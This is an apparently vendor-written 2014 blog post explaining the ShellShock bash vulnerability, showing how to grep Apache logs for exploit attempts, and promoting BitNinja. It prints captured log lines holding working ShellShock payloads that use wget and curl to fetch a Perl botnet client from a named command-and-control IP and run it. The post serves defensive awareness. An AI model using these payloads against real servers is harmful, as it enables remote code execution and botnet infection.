Protect your server from ShellShock attacks with BitNinja

Boglarka Angalet


Many servers are still being involved in ShellShock vulnerability, providing a remote exploit opportunity for attackers.

What does it mean?

 

If your server wasn’t patched against the ShellShock bash bug that was discovered recently, then attackers can easily get root access over it through a special HTTP request. Recently, whole botnets started expanding by the exploitation of this vulnerability. The best defense for fending off ShellShock attacks is updating the bash program and patching the bug. In addition, the research of our team has found that so far an average 9 out of 10 ShellShock attacks have been blocked by BitNinja without the ShellShock filter. Development of BitNinja’s analyzing module (SenseLog) is in full swing. Therefore, we can grant immediate defense against ShellShock attacks by the analysis of log files.

 

Have you perceived ShellShock attempts lately?

 

You can easily check by issuing this command:

cat /var/log/apache2/access.log | grep '() { :;};'

(in the case of apache web server default log placement)

Here you can see an example from one of our webservers. It is a botnet, trying to exploit the ShellShock vulnerability from several different IP addresses.

***.hu 174.127.72.77 - - [25/Nov/2014:17:55:43 +0100] "GET /cgi-bin/sys.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/ig.exe ; curl -O http://88.150.140.66/ig.exe ; perl ig.exe ; rm -rf /var/tmp/ig.exe;rm -rf ig.exe*""***.hu 85.25.26.251 - - [27/Nov/2014:14:59:06 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.hu 85.25.26.251 - - [27/Nov/2014:15:12:34 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 301 336 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.com 85.25.26.251 - - [27/Nov/2014:15:14:34 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 294 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.hu 85.25.26.251 - - [27/Nov/2014:15:16:35 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 294 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.hu 85.25.26.251 - - [27/Nov/2014:15:17:24 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.hu 89.19.10.178 - - [27/Nov/2014:18:22:18 +0100] "GET /cgi-bin/sys.cgi HTTP/1.0" 404 296 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.com 87.119.221.6 - - [27/Nov/2014:21:42:13 +0100] "GET /cgi-bin/admin.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.hu 92.242.4.130 - - [01/Dec/2014:06:05:30 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 298 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""***.hu 92.242.4.130 - - [01/Dec/2014:06:05:33 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""***.hu 92.242.4.130 - - [01/Dec/2014:06:06:12 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 297 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""


What do they have in common?

 

The 88.150.140.66 C&C (Command and Control) server. This server provides the control for the botnet and this is where cancellation of the infectious perl robot file starts from. http://88.150.140.66/mid is a botnet controller program, written in Pearl.

 

What is it for?

 

• waiting for commands through irc
• complete shell run
• tcp flood
• udp flood
• running optional HTTP requests (further expansion)

 

Protect your server from similar attacks!

 
Install BitNinja

 

Setting up is just 3 simple steps

 

• Fill in the registration form to Sign up
Activate your account in the confirmation mail
Install your BitNinja to your server in 5 minutes with your favorite package manager (yum, apt-get)

That’s it! It only takes a few minutes and your servers are safe!

 
 

Share your ideas with us about this article

Previous posts

Increased server security and service value at the same time
The parent company of BitNinja is a Hungarian web hosting company. We recently increased our prices due to our growing feature scale, but our customers keep on being satisfied.   Do you want to know how we did it?    BitNinja helps you not only in your fight against botnets, hackers and other malicious traffic. It can help you to improve your marketing as well. One of the big drawbacks of web hosting is that you cannot control the content that your users upload to your servers. They can be vulnerable and there can be tons of backdoors, exploitable modules, etc. At th...
Web Summit 2014 Experiences
There were 22.000 attendees, from more than 100 countries, with the biggest names in the tech world, more than 500 speakers, lack of wi-fi, 145.000 tweets in 72 hours, many business cards, a high interest in our server defense system and wonderful Irish hospitality. Here’s the wrap up of Web Summit 2014. Web Summit is Europe’s fastest growing technology conference where all the influential people of the industry come together to learn, discuss, get experiences and try themselves, even as speakers or exhibitors. Four years ago it was only a 500-people event, but it has now grown to...